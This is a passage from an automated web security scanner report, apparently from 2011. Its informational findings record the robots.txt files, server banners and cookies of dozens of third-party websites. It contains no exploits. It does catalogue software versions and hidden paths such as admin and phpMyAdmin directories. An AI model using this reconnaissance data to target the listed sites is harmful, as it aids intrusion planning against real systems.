Disallow: /download/
Disallow: /lw/
Disallow: /fla/
Disallow: /phpForm/
Disallow: /web2mail/
Sitemap: http://www.freeweddingtoasts.net/sitemap.xml

27.649. http://www.freshgrub.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freshgrub.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.freshgrub.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:27:12 GMT
Server: Apache
Last-Modified: Sat, 14 Aug 2010 11:08:57 GMT
ETag: "1138ce9-18-48dc6a030afeb"
Accept-Ranges: bytes
Content-Length: 24
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /


27.650. http://www.friedbeef.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.friedbeef.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.friedbeef.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:48:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Cookie,Accept-Encoding
X-Pingback: http://www.friedbeef.com/xmlrpc.php
Set-Cookie: PHPSESSID=302fbef6dd389a64183efbe5b999a573; path=/
Set-Cookie: wp_ozh_wsa_visits=1; expires=Thu, 03-May-2012 03:48:38 GMT; path=/
Set-Cookie: wp_ozh_wsa_visit_lasttime=1304480918; expires=Thu, 03-May-2012 03:48:38 GMT; path=/
Set-Cookie: wpgb_visit_last_php-default=1304480918; expires=Thu, 03-May-2012 03:48:38 GMT; path=/
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

27.651. http://www.fropki.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fropki.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fropki.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:30:32 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 20 Apr 2011 07:30:01 GMT
ETag: "18982c3-3bc-4a15497af1040"
Accept-Ranges: bytes
Content-Length: 956
Cache-Control: max-age=14400
Expires: Wed, 04 May 2011 05:30:32 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: ia_archiver
Disallow: /
User-agent: discobot
Disallow: /
User-agent: nutch
Disallow: /
User-agent: Sosospider
Disallow: /
User-agent: Sogou web spider
Disallow: /
User-agent: magpie-crawle
...[SNIP]...

27.652. http://www.frycomm.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.frycomm.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.frycomm.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:16:50 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 10 Dec 2008 20:12:19 GMT
ETag: "1ca86e4-636-45db6e083aec0"
Accept-Ranges: bytes
Content-Length: 1590
Cache-Control: max-age=1209600
Expires: Wed, 18 May 2011 02:16:50 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

27.653. http://www.ftv.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ftv.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ftv.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Mon, 28 Mar 2011 15:56:11 GMT
Content-Type: text/plain; charset=UTF-8
Date: Wed, 04 May 2011 03:50:39 GMT
Content-Length: 139
Connection: close

User-agent: *
Sitemap: http://www.ftv.com/sitemap.xml
Disallow: /securimage_show.php
Disallow: /profile.html
Disallow: /update_htaccess.php

27.654. http://www.fu-berlin.de/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fu-berlin.de
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fu-berlin.de

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:42:10 GMT
Server: Apache
Last-Modified: Thu, 16 Sep 2010 11:44:54 GMT
ETag: "1131e3f-35e-4905ef97eb980"
Accept-Ranges: bytes
Content-Length: 862
X-UA-Compatible: IE=EmulateIE8
Connection: close
Content-Type: text/plain; charset=utf-8

# Domain: www.fu-berlin.de
User-agent: *
Disallow: /services/
Disallow: /css/
Disallow: /images/
Disallow: /javascript/
Disallow: /suche/
Disallow: /cd/
Disallow: /forschung/service/geraetelis
...[SNIP]...

27.655. http://www.fugitive.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fugitive.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fugitive.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:41:13 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7m
Vary: Cookie
X-Pingback: http://www.fugitive.com/xmlrpc.php
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://www.fugitive.com/sitemap.xml.gz

27.656. http://www.funcityfinder.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.funcityfinder.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.funcityfinder.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:35:31 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.11
Expires: Wed, 27 Apr 2011 03:35:31 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://funcityfinder.com/xmlrpc.php
Last-Modified: Wed, 04 May 2011 03:35:31 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://funcityfinder.com/sitemap.xml

27.657. http://www.fundraiserinsight.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fundraiserinsight.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fundraiserinsight.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:47:08 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 15 May 2009 11:55:36 GMT
ETag: "7a05e9c-233-1f5c7e00"
Accept-Ranges: bytes
Content-Length: 563
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /privacy.html
Disallow: /contact.html
Disallow: /advertise.html
Disallow: /freekit/
Disallow: /directory/ads/
Disallow: /featured/ads/
Disallow: /fundraising-ideas/ads/
Disall
...[SNIP]...

27.658. http://www.futbolred.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.futbolred.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.futbolred.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:12:24 GMT
Server: Apache/1.3.41
Last-Modified: Fri, 30 Oct 2009 15:52:20 GMT
ETag: "47512b-370-4aeb0bb4"
Accept-Ranges: bytes
Content-Length: 880
Keep-Alive: timeout=30, max=300
Connection: Keep-Alive
Content-Type: text/plain

User-Agent: *
Disallow: /media/build/
Disallow: /media/lib/
Disallow: /media/css/
Disallow: /media/swf/

User-agent: sitecheck.internetseer.com
Disallow: /

User-agent: Zealbot
Disallow: /

User-agent
...[SNIP]...

27.659. http://www.gadsdentimes.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gadsdentimes.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gadsdentimes.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Tue, 26 Oct 2010 18:51:12 GMT
Accept-Ranges: bytes
ETag: "25bddc23e75cb1:0"
Server: Microsoft-IIS/7.0
Date: Wed, 04 May 2011 01:55:11 GMT
Content-Length: 645
Age: 5549
X-Cache: HIT from nysquid01
X-Cache-Lookup: HIT from nysquid01:80
Via: 1.0 nysquid01 (squid/3.0.STABLE18)
Connection: close

User-agent: *
Disallow: /apps/pbcs.dll/classifieds
Disallow: /apps/pbcs.dll/events
Disallow: /apps/pbcs.dll/index
Disallow: /apps/pbcs.dll/temaoversikt
Disallow: /apps/pbcs.dll/related
Disallow:
...[SNIP]...

27.660. http://www.gaisma.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gaisma.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gaisma.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:12:26 GMT
Server: Apache/2
Last-Modified: Thu, 29 Mar 2007 07:50:06 GMT
ETag: "1664cf8-178-42ccc00d8c780"
Accept-Ranges: bytes
Content-Length: 376
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

# robots.txt file for http://www.gaisma.com/

User-agent: *
Disallow: /fi/
Disallow: /en/info/preferences.html?
Disallow: /fi/info/preferences.html?
Disallow: /en/info/savepreferences.html
Disallow: /
...[SNIP]...

27.661. http://www.gambling911.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gambling911.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gambling911.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:07:21 GMT
Server: Apache
Last-Modified: Tue, 12 Oct 2010 21:36:49 GMT
ETag: "57401f-651-463a5e40"
Accept-Ranges: bytes
Content-Length: 1617
Cache-Control: max-age=1209600
Expires: Wed, 18 May 2011 02:07:21 GMT
Connection: close
Content-Type: text/plain; charset=utf-8

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

27.662. http://www.gameboy-advance-roms.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gameboy-advance-roms.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gameboy-advance-roms.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:18:14 GMT
Server: Apache/2
Last-Modified: Fri, 10 Dec 2010 16:59:13 GMT
ETag: "707009d-88-46171a40"
Accept-Ranges: bytes
Content-Length: 136
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /go/
Disallow: /buy-r4i.php
Disallow: /buy-ez-flash-iv.php
Disallow: /buy-scds2.php
Disallow: /cgi-bin/
Allow: /

27.663. http://www.gamecheats.eu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gamecheats.eu
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gamecheats.eu

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:17:25 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_fcgid/2.3.5 Phusion_Passenger/2.2.15 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Thu, 23 Dec 2010 21:07:22 GMT
ETag: "73414f-39-4981a417b1680"
Accept-Ranges: bytes
Content-Length: 57
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: index_old.php

27.664. http://www.gamepron.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gamepron.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gamepron.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Wed, 04 May 2011 03:01:58 GMT
Content-Type: text/plain
Content-Length: 135
Last-Modified: Fri, 04 Feb 2011 13:21:04 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /redirect/

User-agent: dotbot
Disallow: /

User-agent: 008
Disallow: /

User-agent: ptd-crawler
Disallow: /    

27.665. http://www.games121.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.games121.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.games121.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain; charset=UTF-8
Expires: Wed, 04 May 2011 19:48:09 GMT
Date: Tue, 03 May 2011 19:48:09 GMT
Last-Modified: Tue, 26 Apr 2011 16:41:22 GMT
ETag: "4eb42ec5-baca-4fcd-91f5-1e0b2d255e2b"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=86400, proxy-revalidate, must-revalidate
Age: 18922

User-agent: Mediapartners-Google
Disallow:

User-agent: *
Disallow: /search
Disallow: /related-content.g
Disallow: /related_content_helper.html

27.666. http://www.gamesforgirlsclub.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gamesforgirlsclub.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gamesforgirlsclub.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Wed, 04 May 2011 00:47:36 GMT
Content-Type: text/plain
Content-Length: 1756
Last-Modified: Fri, 01 Apr 2011 10:43:34 GMT
Connection: close
Vary: Accept-Encoding
X-Debu: /robots.txt - /robots.txt
Accept-Ranges: bytes

# $Id: robots.txt,v 1.7.2.1 2007/03/23 18:57:07 drumm Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by site
...[SNIP]...

27.667. http://www.gamesoid.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gamesoid.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gamesoid.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 22 Feb 2011 05:57:20 GMT
Accept-Ranges: bytes
ETag: "366b5b5e55d2cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:46:14 GMT
Connection: close
Content-Length: 26

...User-agent: *
Allow: /

27.668. http://www.gamevial.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gamevial.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gamevial.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:04:17 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 15 Jul 2010 13:01:48 GMT
ETag: "9bd9f2-18-b4822700"
Accept-Ranges: bytes
Content-Length: 24
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Allow: /


27.669. http://www.ganet.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ganet.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ganet.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:25:10 GMT
Server: Apache/2.2.14
Last-Modified: Tue, 01 Mar 2011 21:01:04 GMT
ETag: "197-49d721828c400"
Accept-Ranges: bytes
Content-Length: 407
Cache-Control: max-age=86400
Expires: Thu, 05 May 2011 03:25:10 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# robots.txt for: http://www.ganet.org/

User-agent: *
Disallow: /admin
Disallow: /api
Disallow: /bak
Disallow: /cache
Disallow: /data
Disallow: /dev
Disallow: /docs
Disallow: /gcrawl
Disal
...[SNIP]...

27.670. http://www.gaport.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gaport.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gaport.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:05:50 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Mon, 08 Mar 2010 22:16:49 GMT
ETag: "66ba52cdbfca1:15ee"
Content-Length: 304

User-agent: *
Disallow: /css
Disallow: /db
Disallow: /faqs
Disallow: /iishelp
Disallow: /company
Disallow: /nf
Disallow: /images
Disallow: /info
Disallow: /templates
Disallow: /1templates
D
...[SNIP]...

27.671. http://www.gardengatemagazine.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gardengatemagazine.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gardengatemagazine.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:01:22 GMT
Server: Apache
Last-Modified: Tue, 07 Jun 2005 20:28:49 GMT
ETag: "11780cf-f0-3f8f9aaf72240"
Accept-Ranges: bytes
Content-Length: 240
X-Internal-Server: web1
Connection: close
Content-Type: text/plain; charset=UTF-8

# robots.txt for http://www.GardenGateMagazine.com/
# robots.txt for http://www.GardenGateMag.com/

User-agent: Googlebot-Image
Disallow: /

User-Agent: *
Disallow: /cgi-bin
Disallow: /weathe
...[SNIP]...

27.672. http://www.gardner-webb.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gardner-webb.edu
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gardner-webb.edu

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:08:24 GMT
Server: Apache/2.2.17 (Unix) DAV/2 mod_scgi_pubsub/1.11-pubsub PHP/5.3.0 mod_perl/2.0.2 Perl/v5.8.8
Last-Modified: Tue, 25 May 2010 12:28:26 GMT
ETag: "81426-1f4-4876a4b45ee80"
Accept-Ranges: bytes
Content-Length: 500
MS-Author-Via: DAV
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:
Disallow: /cgi-bin/
Disallow: https://gwustream.gardner-webb.edu/
Disallow: http://gwudogs.gardner-webb.edu/
Disallow: http://csdev.gardner-webb.edu/*
Disallow: http://volunte
...[SNIP]...

27.673. http://www.garnier.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.garnier.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.garnier.com

Response

HTTP/1.0 200 OK
Content-Length: 27
Content-Type: text/plain
Last-Modified: Thu, 17 Sep 2009 14:50:40 GMT
Accept-Ranges: bytes
ETag: "0605d39a637ca1:24d4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Powered-By: 01
Date: Wed, 04 May 2011 02:09:15 GMT
Connection: close

User-agent: *
Allow: /


27.674. http://www.gartnerstudios.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gartnerstudios.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gartnerstudios.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:41:01 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 28 Apr 2010 13:18:28 GMT
ETag: "54b3176-636-d87db100"
Accept-Ranges: bytes
Content-Length: 1590
Cache-Control: max-age=1209600
Expires: Wed, 18 May 2011 00:41:01 GMT
Connection: close
Content-Type: text/plain

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

27.675. http://www.gas2.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gas2.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gas2.org

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 04 May 2011 01:19:22 GMT
Content-Type: text/plain; charset=utf-8
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.7ppa5~lucid1
Set-Cookie: loggedin_user_fullname=deleted; expires=Tue, 04-May-2010 01:19:21 GMT; path=/; domain=importantmedia.org
Set-Cookie: loggedin_user_id=deleted; expires=Tue, 04-May-2010 01:19:21 GMT; path=/; domain=importantmedia.org
Set-Cookie: loggedin_user_role=user; expires=Thu, 05-May-2011 02:19:22 GMT; path=/; domain=importantmedia.org
Set-Cookie: xml_logout_url=http%253A%252F%252Fgas2.org%252Fwp-login.php%253Faction%253Dlogout%2526amp%253Bredirect_to%253Dhttp%25253A%25252F%25252Fgas2.org%2526amp%253B_wpnonce%253Dcdd9cb9e2b; expires=Thu, 05-May-2011 02:19:22 GMT; path=/; domain=importantmedia.org
X-Pingback: http://gas2.org/xmlrpc.php
Set-Cookie: bp-message=deleted; expires=Tue, 04-May-2010 01:19:21 GMT; path=/
Set-Cookie: bp-message-type=deleted; expires=Tue, 04-May-2010 01:19:21 GMT; path=/


# XML Sitemap Feed 3.9.1 (http://4visions.nl/en/wordpress-plugins/xml-sitemap-feed/)
Sitemap: http://gas2.org/sitemap.xml
Sitemap: http://gas2.org/sitemap-news.xml

User-agent: *
Disallow:

27.676. http://www.gcnlive.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gcnlive.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gcnlive.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:49:48 GMT
Server: Apache/2.2.17 (Fedora)
Last-Modified: Fri, 11 Mar 2011 14:40:01 GMT
ETag: "10023a-9f-49e35efd8a171"
Accept-Ranges: bytes
Content-Length: 159
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /phpMyAdmin/
Disallow: /wp/wp-admin/
Disallow: /wp/wp-includes/js/
Disallow: /assets/scripts/
Disallow: /assets/pikachoose/js/


27.677. http://www.geckohospitality.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.geckohospitality.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.geckohospitality.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:52:02 GMT
Server: Apache
Last-Modified: Mon, 19 Apr 2010 08:26:20 GMT
ETag: "ff6e20-5b2-48492b72b4300"
Accept-Ranges: bytes
Content-Length: 1458
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /announcerweb/
Disallow: /beta/
Disallow: /blog/
Disallow: /blog2/
Disallow: /calendar/
Disallow: /careerbuilder/
Disallow: /careerfair/
Disallow:
...[SNIP]...

27.678. http://www.geeky-gadgets.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.geeky-gadgets.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.geeky-gadgets.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:07:58 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 mod_perl/2.0.4 Perl/v5.8.8
Last-Modified: Thu, 20 Jan 2011 14:09:22 GMT
ETag: "2fc-49a47ae272880"
Accept-Ranges: bytes
Content-Length: 764
Cache-Control: public, must-revalidate, proxy-revalidate
Expires: Wed, 04 May 2011 03:07:58 GMT
Pragma: public
X-Powered-By: W3 Total Cache/0.9.1.3
Connection: close
Content-Type: text/plain

User-Agent: *
Allow: /

Sitemap: http://www.geeky-gadgets.com/sitemap.xml

User-agent: Googlebot
Allow: /

User-agent: Googlebot-Image
Allow: /

User-agent: Mediapartners-Google
Allow: /

...[SNIP]...

27.679. http://www.gemvara.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gemvara.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gemvara.com

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=YKMIMIS192.168.100.193CKOUL; path=/
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Set-Cookie: JSESSIONID=8EE1AE2D26964A2A5B75E20F62700B5F; Path=/
Set-Cookie: BrowserSession=37367891; Path=/
Set-Cookie: CustomerAccountCookie=2885639; Expires=Thu, 03-May-2012 06:52:55 GMT; Path=/
Set-Cookie: ABTesting=l-B_v-A_e-B_c-C_w-B_g-B_f-A_; Expires=Thu, 03-May-2012 06:52:55 GMT; Path=/
Set-Cookie: CustomerAccountCookie=2885639; Expires=Thu, 03-May-2012 06:52:55 GMT; Path=/
Accept-Ranges: bytes
ETag: W/"190-1304108940000"
Last-Modified: Fri, 29 Apr 2011 20:29:00 GMT
Content-Type: text/plain;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 190
Date: Wed, 04 May 2011 01:04:09 GMT
Connection: close

User-agent: *
Allow: /
Allow: /*/secure-jewelry/
Disallow: /b2c_api/
Disallow: /ajax/
Disallow: /*/secure-
Disallow: /*/wishlist/
Disallow: /*/account/
Disallow: /vdc/images/

Crawl-delay: 1

27.680. http://www.genealinks.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.genealinks.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.genealinks.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:09:02 GMT
Server: Apache/1.3.20 (Unix) PHP/4.0.6
Last-Modified: Sat, 04 Sep 2010 00:11:07 GMT
ETag: "dbbfd-7e-4c818e9b"
Accept-Ranges: bytes
Content-Length: 126
Connection: close
Content-Type: text/plain
X-Pad: avoid browser bug

User-agent: *

Disallow: /affsearch/
Disallow: /affsearch300/
Disallow: /affsearch599/
Disallow: /images/
Disallow: /_private/

27.681. http://www.georgeforemancooking.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.georgeforemancooking.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.georgeforemancooking.com

Response

HTTP/1.1 200 OK
Content-Length: 2590
Content-Type: text/plain
Last-Modified: Wed, 28 Apr 2010 06:15:14 GMT
Accept-Ranges: bytes
ETag: "085262a9ae6ca1:82a5"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:43:27 GMT
Connection: close

User-agent: *
Disallow: /ASPDNSFCommon/
Disallow: /ASPDNSFEncrypt/
Disallow: /ASPDNSFGateways/
Disallow: /ASPDNSFPatterns/
Disallow: /ASPDNSFQuickBooks/
Disallow: /bin/
Disallow: /categorydescr
...[SNIP]...

27.682. http://www.germangrannytube.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.germangrannytube.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.germangrannytube.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:27:55 GMT
Server: Apache
Last-Modified: Thu, 09 Sep 2010 20:52:32 GMT
ETag: "35ba5a1-143-48fd9cf186400"
Accept-Ranges: bytes
Content-Length: 323
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/

Disallow: /toplists/
Disallow: /st/st.php
Disallow: /gallery/
Disallow: /mature_granny/

sitemap: http://germangrannytube.com/sitemap.xml
sitemap: http://germangran
...[SNIP]...

27.683. http://www.get-music.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.get-music.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.get-music.net

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 04 May 2011 03:23:31 GMT
Content-Type: text/plain
Content-Length: 88
Last-Modified: Sat, 01 Aug 2009 11:12:42 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /invisible/
Disallow: /logs/
Disallow: /user/
Disallow: /LE/

27.684. http://www.getours.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.getours.com
